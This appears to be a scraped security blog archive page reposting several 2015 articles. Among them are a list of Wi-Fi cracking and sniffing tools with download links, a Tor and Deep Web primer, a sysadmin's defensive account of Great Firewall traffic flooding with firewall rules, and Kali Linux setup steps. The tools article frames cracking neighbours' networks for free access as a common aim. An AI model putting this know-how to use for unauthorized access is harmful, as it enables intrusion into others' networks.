Search

vulnerablelife

Vulnerable Life by Vulneraman | Cyber Security Blog

Month

February 2015

13 Popular Wireless Hacking Tools

Internet is now the basic need of our daily life. With the increasing use of smartphones, most of the things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere.

People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use it for free. But most these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks.

Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing.

In this article, I am going to discuss wireless security and best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks.

Wireless Networks and Hacking

Wireless networks are based on IEEE 802.11 standards defined by IEEE(Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way.

Basically there are two types of vulnerabilities which can be found in the Wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include the weak password, no security settings, use of default configurations, and other user related things. Poor encryption is related to security keys used to protect the wireless network. It is there because of issues in WEP or WPA.

WEP and WPA

WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weakness were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security.

Basically wireless hacking tools are of two types. One of which can be used to sniff the network and monitor what is happening in the network. And other kinds of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting.

1. Aircrack

Aircrack is one of the most popular wireless passwords cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations.

The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try Live CD or VMWare image. VMWare Image needs less knowledge, but it only works with a limited set of host OS, and only USB devices are supported.

Before you start using this too, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you will follow steps properly, you will end up getting success with this tool.

Download: http://www.aircrack-ng.org/

2. AirSnort

AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.

Download: http://sourceforge.net/projects/airsnort/

3. Cain & Able

Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool.

Download: http://www.oxid.it/cain.html

4. Kismet

Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms.

Download: http://www.kismetwireless.net/

5. NetStumbler

NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler.

Basically NetStumblet is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more.

But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64 bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool.

Download Netstumbler: http://www.stumbler.net/

6. inSSIDer

inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was opensource. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records.

Download inSSIDer: http://www.inssider.com/

7. WireShark

WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaries, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge.

Download Wireshark: https://www.wireshark.org/

8. CoWPAtty

CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack.

Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hack for each word contained in the dictionary by using the SSID.

The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIs. But if your SSID is not in those 1000, you are unlucky.

Download CoWPAtty: http://sourceforge.net/projects/cowpatty/

9. Airjack

Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network.

Download AirJack: http://sourceforge.net/projects/airjack/

10. WepAttack

WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.

Download WebAttack: http://wepattack.sourceforge.net/

11. OmniPeek

OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool.

Download:http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

12. CommView for WiFi

CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution.

Captured packets can be decrypted by user-defined WEP or WPA keys.

This tool is basically for wi-fi network admins, security professionals, and home users who want to monitor their wi-fi traffic and programmers working on software for wireless networks.

Download CommView: http://www.tamos.com/products/commwifi/

13. CloudCracker

CloudCracker is the online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks.

Try Cloudcracker: https://www.cloudcracker.com/

Conclusion

In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access.

The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works. As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network.

Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network.

Original Post: http://resources.infosecinstitute.com/13-popular-wireless-hacking-tools/

Advertisements

BBC HORIZON – DEFEATING THE HACKERS HD

Full Video: http://www.disclose.tv/embed/157242

Exploring the murky and fast-paced world of the hackers out to steal money and identities and wreak havoc with people’s online lives, and the scientists who are joining forces to help defeat meets the two men who uncovered the world’s first cyber weapon, the pioneers of what is called ultra paranoid computing, and the computer expert who worked out how to hack into cash machines.

Original Post: http://www.disclose.tv/action/viewvideo/157242/BBC_Horizon__Defeating_the_Hackers_HD/

OWASP CODE PULSE PROJECT

The OWASP Code Pulse Project is a tool that provides insight into the real-time code coverage of black box testing activities. It is a cross-platform desktop application that runs on most major platforms.

How it works

Code Pulse does its magic by monitoring the runtime of the target application using an agent-based approach that sits deep in the stack of the virtual machine executing the application’s binaries. Due to the intimate nature of our tracing approach we currently support Java Virtual Machines, but we do have plans to add support for .NET applications. Although Code Pulse will likely also work for desktop application, our current focus is in providing the best experience for web application testing.

Why Code Pulse?

Whereas in the past it’s been very difficult to understand which parts of an application a DAST or manual penetration test covered, Code Pulse automatically detects the coverage information while the tests are being conducted and will even make it possible to understand the overlaps and boundaries of the different tools’ coverage.

Code Pulse presents the coverage information in a visual form to make it easy to understand at-a-glance which parts of an application have been covered, and how much. The real-time coverage feedback makes it easy to adjust testing activity based on the observed coverage. In addition for testing activities relying on multiple techniques (a variety of dynamic analysis tools for instance) it’s fairly easy to split up the recorded activity to understand which code was covered by each tool independently or alternatively to view where the coverage overlaps between multiple tools.

Licensing

OWASP Code Pulse project is free to use. It is licensed under the Apache 2.0 License.

References: CodePulse official http://code-pulse.com/website.

Original Post: http://www.hackinsight.org/news,239.html

Obama’s Executive Order urges Companies to Share CyberSecurity Threat Data

Obama-executive-order

President Barack Obama signed an executive order on Friday that encourages and promotes sharing of information on cybersecurity threats within the private sector and between the private sector companies and the government agencies as well.

AREAS TO IMPROVE
During his speech at the White House Cybersecurity Summit at Stanford University in California, where many tech leaders and other government officials also assembled, the President highlighted events affecting cybersecurity and the development of the Internet.
The four areas that Obama believes must be improved are listed below:
  • Development and evolution of the Internet
  • Cybersecurity
  • Rights of individuals in regards to the Internet
  • Cooperation between the Government and private companies
EVERYONE IS VULNERABLE – OBAMA

The cyber world is sort of the Wild Wild West and to some degree we are asked to be the sheriff,” Mr. President told a crowd at the Memorial Auditorium. “When something like Sony happens, people want to know what government can do about it. The technology so often outstrips whatever rules and structures and standards have been put in place.

Everybody’s online and everybody’s vulnerable,” Obama stressed.

White House believes that the primary means of online security shouldn’t depend on passwords, and we must have some new technologies that combine greater security and convenience to the online users. In order to ensures a user’s security online, the technology must move beyond usernames and passwords.
EXECUTIVE ORDER
The Obama ‘Executive order’ is meant to establish a framework in efforts to help businesses and government organizations “prioritize and optimize” their spending, and quickly identify and protect themselves against cyberthreats, carried out by both hackers and foreign nations. The framework will also polish communication across companies and organizations to better manage cyber risks.

There’s only one way to defend America from these cyberthreats, and that is with government and [private] industry working together, sharing appropriate information.”

The major companies including Apple, Intel, Bank of America and Pacific Gas & Electric (PG&E) have already committed themselves to the government’s new cyberthreat framework.
The executive order added the Department of Homeland Security to the list of government organizations that would be able to approve the sharing of classified information and ensure that proper information is shared between the entities.
CYBERSECURITY FRAMEWORK
Since 2013, the Obama’s administration has been actively working on this issue, when the president signed a previous executive order on Critical Infrastructure Cybersecurity. That, in turn, resulted in the development of the “Cybersecurity Framework.”
Obama acknowledged the challenge to protect American citizens from cyber threats, but at the same time protect their right to privacy. He mentioned companies such as Symantec, Intel and Bank of America are going to use the government’s improved Cybersecurity Framework to strengthen their own defenses.
Facebook CEO Mark Zuckerberg, Yahoo CEO Marissa Mayer and Google’s Larry Page and Eric Schmidt were all invited to the Stanford event, but won’t attend, according to the companies. Apple CEO Tim Cook is making an appearance, talking about people’s rights to privacy and security.
ONCE AGAIN ONLINE PRIVACY IS IN QUESTION
Of course, the news is not great for everybody because this new executive order will reduce legal liability for companies that share too much information of its users.
Also, no one can guarantee whether the private sector will be willing to offer this information, as many companies are still reeling from Edward Snowden’s revelations about how the government agencies are using users information to spy on their customers in the US and abroad.
A copy of the executive order has yet to be published on the White House website.

What is the Deep Web? A first trip into the abyss

What is the Deep Web

The Deep Web (or Invisible web) is the set of information resources on the World Wide Web not reported by normal search engines.

According several researches the principal search engines index only a small portion of the overall web content, the remaining part is unknown to the majority of web users.
What do you think if you were told that under our feet, there is a world larger than ours and much more crowded? We will literally be shocked, and this is the reaction of those individual who can understand the existence of theDeep Web, a network of interconnected systems, are not indexed, having a size hundreds of times higher than the current web, around 500 times.
Very exhaustive is the definition provided by the founder of BrightPlanet, Mike Bergman, that compared searching on the Internet today to dragging a net across the surface of the ocean: a great deal may be caught in the net, but there is a wealth of information that is deep and therefore missed.
Ordinary search engines to find content on the web using software called “crawlers”. This Deep Web technique is ineffective for finding the hidden resources of the Web that could be classified into the following categories:
  • Dynamic content: dynamic pages which are returned in response to a submitted query or accessed only through a form, especially if open-domain input elements (such as text fields) are used; such fields are hard to navigate without domain knowledge.
  • Unlinked content: pages which are not linked to by other pages, which may prevent Web crawling programs from accessing the content. This content is referred to as pages without backlinks (or inlinks).
  • Private Web: sites that require registration and login (password-protected resources).
  • Contextual Web: pages with content varying for different access contexts (e.g., ranges of client IP addresses or previous navigation sequence).
  • Limited access content: sites that limit access to their pages in a technical way (e.g., using the Robots Exclusion Standard, CAPTCHAs, or no-cache Pragma HTTP headers which prohibit search engines from browsing them and creating cached copies).
  • Scripted content: pages that are only accessible through links produced by JavaScript as well as content dynamically downloaded from Web servers via Flash or Ajax solutions.
  • Non-HTML/text content: textual content encoded in multimedia (image or video) files or specific file formats not handled by search engines.
  • Text content using the Gopher protocol and files hosted on FTP that are not indexed by most search engines. Engines such as Google do not index pages outside of HTTP or HTTPS.
A parallel web that has a much wider number of information represents an invaluable resource for private companies, governments, and especially cybercrime. In the imagination of many persons, the Deep Web term is associated with the concept of anonymity that goes with criminal intents the cannot be pursued because submerged in an inaccessible world.
As we will see this interpretation of the Deep Web is deeply wrong, we are facing with a network definitely different from the usual web but in many ways repeats the same issues in a different sense.
What is a Tor? How to preserve the anonymity?
Tor is the acronym of “The onion router”, a system implemented to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers hiding user’s information eluding any activities of monitoring.
As usually happen, the project was born in military sector, sponsored the US Naval Research Laboratory and from 2004 to 2005 it was supported by the Electronic Frontier Foundation.
Actually the software is under development and maintenance of Tor Project. A user that navigate using Tor it’s difficult to trace ensuring his privacy because the data are encrypted multiple times passing through nodes, Tor relays, of the network.
Connecting to the Tor network
Imagine a typical scenario where Alice desire to be connected with Bob using the Tor network. Let’s see step by step how it is possible.
She makes an unencrypted connection to a centralized directory server containing the addresses of Tor nodes. After receiving the address list from the directory server the Tor client software will connect to a random node (the entry node), through an encrypted connection. The entry node would make an encrypted connection to a random second node which would in turn do the same to connect to a random third Tor node. The process goes on until it involves a node (exit node) connected to the destination.
Consider that during Tor routing, in each connection, the Tor node are randomly chosen and the same node cannot be used twice in the same path.
To ensure anonymity the connections have a fixed duration. Every ten minutes to avoid statistical analysis that could compromise the user’s privacy, the client software changes the entry node.
Up to now we have considered an ideal situation in which a user accesses the network only to connect to another. To further complicate the discussion, in a real scenario, the node Alice could in turn be used as a node for routing purposes with other established connections between other users.
A malevolent third party would not be able to know which connection is initiated as a user and which as node making impossible the monitoring of the communications.
Tor network

After this necessary parenthesis on Tor network routing we are ready to enter the Deep Web simply using the Tor software from the official web site of the project. Tor is able to work on all the existing platforms and many add-ons make simple they integration in existing applications, including web browsers. Despite the network has been projected to protect user’s privacy, to be really anonymous it’s suggested to go though a VPN.

A better mode to navigate inside the deep web is to use the Tails OS distribution which is bootable from any machine don’t leaving a trace on the host. Once the Tor Bundle is installed it comes with its own portable Firefox version, ideal for anonymous navigation due an appropriate control of installed plugins, in the commercial version in fact common plugins could expose our identity.
Once inside the network, where it possible to go and what is it possible to find?
Well once inside the deep web we must understand that the navigation is quite different from ordinary web, every research is more complex due the absence of indexing of the content.
A user that start it’s navigation in the Deep Web have to know that a common way to list the content is to adopt collection of Wikis and BBS-like sites which have the main purpose to aggregate links categorizing them in more suitable groups of consulting. Another difference that user has to take in mind is that instead of classic extensions (e.g. .com, .gov) the domains in the Deep Web generally end with the .onion suffix.
Following a short list of links that have made famous the Deep Web published on Pastebin.
Tor network
Cleaned Hidden Wiki should be a also a good starting point for the first navigation. Be careful, some content are labeled with common used tag such as CP= child porn, PD is pedophile, stay far from them.
The Deep Web is considered the place where every thing is possible, you can find every kind of material and services for sale, most of them illegal. The hidden web offers to cybercrime great business opportunity, hacking services, malware, stolen credit cards, weapons.
We all know the potentiality of the e-commerce in ordinary web and its impressive growth in last couple of years, well now imagine the Deep Web market that is more that 500 times bigger and where there is no legal limits on the odds to sell. We are facing with amazing business controlled by ciber criminal organizations.
Speaking of dark market we cannot avoid to mention Silk Road web site, an online marketplace located in the Deep Web, the majority of its products are derived from illegal activities. Of course it’s not the only one, many other markets are managed to address specify products, believe me, many of them are terrifying.
Silk Road
Most transactions on the Deep Web accept Bitcoin system for payments allowing the purchase of any kind of products preserving the anonymity of the transaction, encouraging the development of trade in respect to any kind of illegal activities. We are facing with a with an autonomous system that advantage the exercise of criminal activities while ensuring the anonymity of transactions and the inability to track down the criminals.
But is it really all anonymous? Is it possible to be traced in the Deep Web? What is the position of the governments towards the Deep Web?
I will provide more information on the topic in next articles … in meantime let me thank a great expert of the Deep Web, “The gAtOmAlO” with whom I collaborate on a project which we will present you soon.
Original Post: http://thehackernews.com/2012/05/what-is-deep-web-first-trip-into-abyss.html

What if Great Firewall of China sending huge traffic to you

I’ve been using the Internet in one form or another since the mid-80′s. In that time, I’ve seen a lot of strange stuff happening on our global network. On Tuesday, I experienced something extraordinary.

It all started with a text message from my partner Ged at 8:30 AM:

Mail server down. Please take a look when you can, thx.

I verified that the mail server was down from the west coast as well as the east coast, then started poking around to see what was wrong. When I looked at the server traffic, there was only one thing I could say:

daily

“Holy shit.”

Unless you’re a network engineer, that graph won’t mean much. The data shown is the amount of bandwidth into the Iconfactory’s main server. The blue line is the number of megabits per second for requests and the green area is the amount for responses to those requests. Normally, the blue line is much smaller than the green area: a small HTTP request returns larger HTML, CSS and images.

The number of requests peaked out at 52 Mbps. Let’s put that number in perspective: Daring Fireball is notorious for taking down sites by sending them about 500 Kbps of traffic. What we had just experienced was roughly the equivalent of 100 fireballs.

If each of those requests were 500 bytes, that’s 13,000 requests per second. That’s about a third of Google’s global search traffic. Look at how much careful planning went into handling Kim Kardashian’s butt at8,000 requests per second.

All of this traffic directed at one IP address backed by a single server with a four core CPU.

Like I said, “Holy shit.”

Regaining Control

The first course of business was to regain control of the server. Every service on the machine was unresponsive, including SSH. The only thing to do was perform a remote restart and wait for things to come back online.

As soon as I got a shell prompt, I disabled the web server since that was the most likely source of the traffic. I was right: things quieted down as soon as traffic on port 80 and 443 was rejected. It was 9:30 AM (and you can see it in the graph above.)

The first log I looked at showed a kernel panic at 3:03 AM in zalloc. This was right at the time of the biggest spike. The system.log showed similar problems: the high level of traffic was causing all kinds of memory issues caused by too many processes.

As a test, I turned the server back on for a minute and immediately maxed out Apache’s MaxClients. Our server simply isn’t capable of handling thousands of Apache child processes (it normally runs with less than a hundred.)

So where the hell was all this traffic coming from?

Triage

Since I knew the traffic was from the web, it was likely that Apache’s logs would tell me something. Given that our Apache logs are usually in the 10 MB range, the current 100 MB log file surely contained a lot of useful information.

The first thing I noticed was a lot of requests being returned with a 403 status code. The paths for those requests also made no sense at all: one of the most common began with “/announce”. But there was also a lot of requests that looked like they were intended for CDNs, YouTube, Facebook, Twitter and other places that were not the Iconfactory.

As a test, I updated Apache’s CustomLog configuration with %{Host}i so it would show me the host headers being sent with the requests. I then turned the web server back on for 30 seconds and collected data. Indeed, the traffic we were seeing on our server was destined forsomeplace else.

The CHOCK was pretty proud to be serving traffic for cdn.gayhotlove.com, but I sure wasn’t.

Clearly there was some kind problem with traffic being routed to the wrong place. The most likely candidate would, of course, be DNS. While looking at IP addresses in my logs, I noticed something interesting: all of this traffic was coming from China.

The pieces were starting to fall into place. I understood the problem:

(Note: The “GFW” in responses refers to China’s Great Firewall. I’m pretty good with acronyms, but this was a new one to me!)

Now all I had to do was find a way to deal with the traffic.

Apache Configuration

My first thought was to deal with the traffic was by handling the HTTP traffic more efficiently.

We host several sites on our server and use VirtualHost to route traffic on a single IP address to multiple websites. Virtual hosts rely on the “Host:” header in the HTTP request to determine where the traffic should head, and as we’ve seen above, the host information was totally bogus.

One thing I learned is that Apache can have problems figuring out which virtual host to use in some cases:

If no ServerName is specified, then the server attempts to deduce the hostname by performing a reverse lookup on the IP address.

Remember that millions of requests had a host name that would need to be looked up. After consulting the documentation, I setup a virtual host that would quickly return a 404 error for the request and display a special message at the root directory. Here’s what it looks like:

<VirtualHost _default_:80>
    ServerName default
    DocumentRoot "/Web/Sites/default"
    <Directory "/Web/Sites/default">
        Options None
        AllowOverride None
        DAV Off
    </Directory>
    LogLevel warn
</VirtualHost>

If you run a server, take a second right now to make sure that it’s doing the right thing when presented with a bad header:

$ curl -H "Host: facebook.com" http://199.192.241.217

All of this helped deal with the traffic, but it only slowed down the amount of time it took Apache to max out the child processes. A Twitter follower in China also reminded me that their day was just beginning and traffic would be picking up. At 8 PM, the trend for traffic didn’t look good, so I turned off the web services and had a very stiff drink.

Then something strange happened at 11:30 PM: the inbound requests started to die off. Someone in China had flipped a switch.

I was tempted to bring the web server back up, but experience told me to leave things as they were. Michter’s and bash don’t make a good pair.

This problem would have to wait for another day.

Hello BitTorrent

The next morning, I tried bringing up the web server. Things ran fine for awhile, but after 10 minutes or so, Apache processes started climbing again.

Most of the traffic was to the BitTorrent /announce URL. BitTorrent clients in China still thought my server was a tracker and were noticing that port 80 was alive again.

And it’s not like there are just a couple of people using BitTorrent in China.

The direct traffic from DNS may have gone away, but secondary traffic from cached information was still killing us. At this point, the only recourse was to block IP addresses.

Blocking China

I’m a big believer in the power of an open and freely accessible Internet: I don’t take blocking traffic from innocent people lightly. But in this case, it’s the only thing that worked. If you get a DDOS like what I’ve described above, this should be the first thing you do.

The first step is to get a list of all the IP address blocks in the country. At present that’s 5,244 separate zones. You’ll then need to feed them to your firewall.

In our case, we use ipfw. So I wrote a script to create a list of rules from the cn.zone file:

#!/bin/sh

# cn.zone comes from http://www.ipdeny.com/ipblocks/
#
# build the rules with:
#
# $ build_rules > /tmp/china_rules
#
# apply rules with:
#
# $ sudo ipfw /tmp/china_rules 

r=1100
while read line; do
	echo "add $r deny ip from " $line " to any in";
	r=$(( $r + 1 ))
done < cn.zone

You’ll want to adjust the starting rule number (1100 above) to one that’s before the allow on port 80.

After setting these new rules, traffic on our server immediately returned to normal.

Digging Deeper

Now that I had my server back, I could take some time to look at logs more closely and see if anyone else had seen similar issues.

First Hits

BitTorrent /announce traffic turned up a few clues. I had noticed a few 5 Mbps spikes in our request traffic late on Thursday, January 15th and on the following Saturday:

weekly

Initially, I just chalked it up to random bullshit traffic on the Internet, much like the packets from Romania looking for phpMyAdmin. In retrospect, that was dumb.

If you look at the origins of those first packets, you’ll see that it’s not a regional problem: the IP addresses are physically located all the way from densely populated Hong Kong to the remoteness of Xinjiang province (north of Tibet.)

Was this traffic a probe or an unintentional screwup? I don’t know.

(Note: I have archived all of the logs mentioned above. If you have legitimate reason to analyze these logs, please get in touch.)

We’re Not Alone

More concerning, is that other site owners are seeing similar behaviorstarting in early January. I took some comfort in knowing that we weren’t alone on the 20th.

But at the end of the day, every machine in China has the potential be a part of a massive DDOS attack on innocent sites. As my colleagueSean quipped, “They have weaponized their entire population.”

Conclusion

Will this happen again? For everyone’s sake, I hope not. The people of China will only end up being banned from more websites and site owners will waste many hours in total panic.

But if it does happen, I hope this document helps you deal with China’s formidable firehose.

Other Resources

If you’re using ngnix instead of Apache, here are some instructions for blocking BitTorrent requests from China.

For those of you using iptables on Linux, here’s a tutorial for blocking IPs on that platform. It’s also interesting to note that Matt’s site is running on Linode: don’t assume that big providers will offer any protection upstream.

This thread has a good discussion with other site owners experiencing the BitTorrent traffic.

Another option to consider is moving the server’s IP address. You’ll have to deal with the normal DNS propagation and reconfigure reverse DNS (especially if you’re running a mail server on the box), but this may be quick and effective way to avoid the firehose.

Updated January 24th, 2015: Added the section above with additional resources for those of you who are experiencing the problem. Good luck!

Updated January 28th, 2015: I’ve written some opinions on the incident described above.

Original Post: http://furbo.org/2015/01/22/fear-china/

Things To Do After Installing Kali Linux

Foto: kali.org

Kali Specific:

1. Fix Device Not Managed Error – Wired Network

If you want NetworkManager to handle interfaces that are enabled in /etc/network/interfaces: Set managed=true in/etc/NetworkManager/NetworkManager.conf. So this file looks like:
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true
How to fix Wired Network interface is Unmanaged error in Debian or Kali Linux - 1  - blackMORE Ops

2. Fix Default Repository

The simplest way is to edit the /etc/apt/sources.list remove or comment every-line with # at the front and add the following lines..
 leafpad /etc/apt/sources.list
Comment or remove existing config with the following lines:
## Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Save and close the file.   Details and explanations can be found in adding official Kali Linux Repositories page.

3. Update, Upgrade, Dist-Upgrade

Clean, update, upgrade and dist-upgrade your Kali installation.
 apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

4. Fix PulseAudio Warning

My Kali throws me this warning:
[warn] PulseAudio configured for per-user sessions ... (warning).
Debian variants also throws similar warning during boot.To fix this do the following:
leafpad /etc/default/pulseaudio
Find this line:
PULSEAUDIO_SYSTEM_START=0
Replace 0 with 1
PULSEAUDIO_SYSTEM_START=1
Where, 0 = don’t start in system mode, 1 = start in system mode
reboot
I am having second thoughts about this step, refer to the whole article below to know WHY! If you have a suggestion about it, leave that on that article so that I can sort through them and pick the best one.

5. Enable Sound On Boot

Follow the steps below to fix sound mute in Kali Linux on boot
apt-get install alsa-utils -y
In GNOME Desktop (The default Kali Desktop)
  • Right Click on the small volume ICON and select Sound Preferences
  • Alternatively, you can also go to Applications > System Tools > Preferences  > System Settings > Sound to bring up the same options.
  • Use the Output volume slider to ON, shown similar the screenshot above. That’s it you’re done. Close Sound window.
Fix sound mute in Kali Linux on boot - 2 - blackMORE Ops
Details and explanations can be found in fixing sound mute in Kali Linux on boot page.

Useful Utilities And Software’s

6. Install Java

Go to the following link and download jdk7. At the time of writing this guide the jdk version was jdk-7u45-linux-x64. Note that I’m using x64 which is 64-bit. 32-bit users should choose their versions accordingly. Not that tough really!
Oracle Sun Java JDK in Kali Linux
Following is what I’ve used. JDK-7u45-Linux-x64 At the time of writing this guide the available version was jdk-7u45-linux-x64.tar.gzDownload and save the file in /root directory.
tar -xzvf /root/jdk-7u45-linux-x64.tar.gz
mv jdk1.7.0_45 /opt
cd /opt/jdk1.7.0_45
This step registers the downloaded version of Java as an alternative, and switches it to be used as the default:
update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_45/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_45/bin/javac 1
update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so 1
update-alternatives --set java /opt/jdk1.7.0_45/bin/java
update-alternatives --set javac /opt/jdk1.7.0_45/bin/javac
update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so
Follow installing Java JDK in Kali Linux post for step by step instructions and testing options.

7. Install Flash

This is fairly simple and easy and should work from most people out there: In the terminal:
apt-get install flashplugin-nonfree
and then type in:
update-flashplugin-nonfree --install
That’s it. You flash should be working as expected.
Adobe Flash in Kali Linux
Follow installing Flash in Kali Linux post for step by step instructions and testing options. This post also includes manual Flash installation procedures for those whose installation might fail with above mentioned process.

8. Install File Roller – Archive Manager

Kali Linux lacks a proper GUI archive manager. Install it Archive Manager (File Roller) using the following command:
apt-get install unrar unace rar unrar p7zip zip unzip p7zip-full p7zip-rar file-roller -y
You can now find Archive Manager in Applications > Accessories > Archive Manager.

9. Add A Standard User

Kali Linux got only root user by default. While most applications require root access, it’s always a good idea to add a second user. Open terminal and type following to create new user (replace user1 with your desired user name)
useradd -m user1
(Note: -m means create home directory which is usually /home/username)
How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -2
Now set password for this user
passwd user1
Enter desired password twice Add user to sudo group (to allow user to install software, allow printing, use privileged mode etc.)
usermod -a -G sudo user1
(Note: -a means append or add and –G mean to specified group/groups) Change default shell of previously created user to bash
chsh -s /bin/bash user1
To learn more, follow this excellent and detailed post on adding remove user (standard user/non-root) in Kali Linux. This post explains how to add a user with all user directories already in place (thereby avoiding “Could not update .ICEauthority var/lib/gdm3/.ICEauthority” or any error containing .ICEauthority or permission in general.

10. Add Add-Apt-Repository

Debian allows users to add and use PPA repositories by an application named add-apt-repository however, Kali Linux didn’t include this in their default package list. With Kali, because this is a special purpose application and certain modifications were made to make it work for what it does best (Penetration Test). To enable PPA Repository via add-apt-repository application, follow the steps below: First install Python Software properties package.
apt-get install python-software-properties
Next install apt-file
apt-get install apt-file
Update apt-file.
apt-file update
This takes a while, so in case your apt-file update is SLOW, you might want to try and fix that as well. (Note that I got repo.kali.org in my /etc/apt/sources.list file instead of http.kali.org.) Once apt-file update is complete, you should be able to search for it.
apt-file search add-apt-repository
Your output should look similar to this:
python-software-properties: /usr/bin/add-apt-repository
python-software-properties: /usr/share/man/man1/add-apt-repository.1.gz
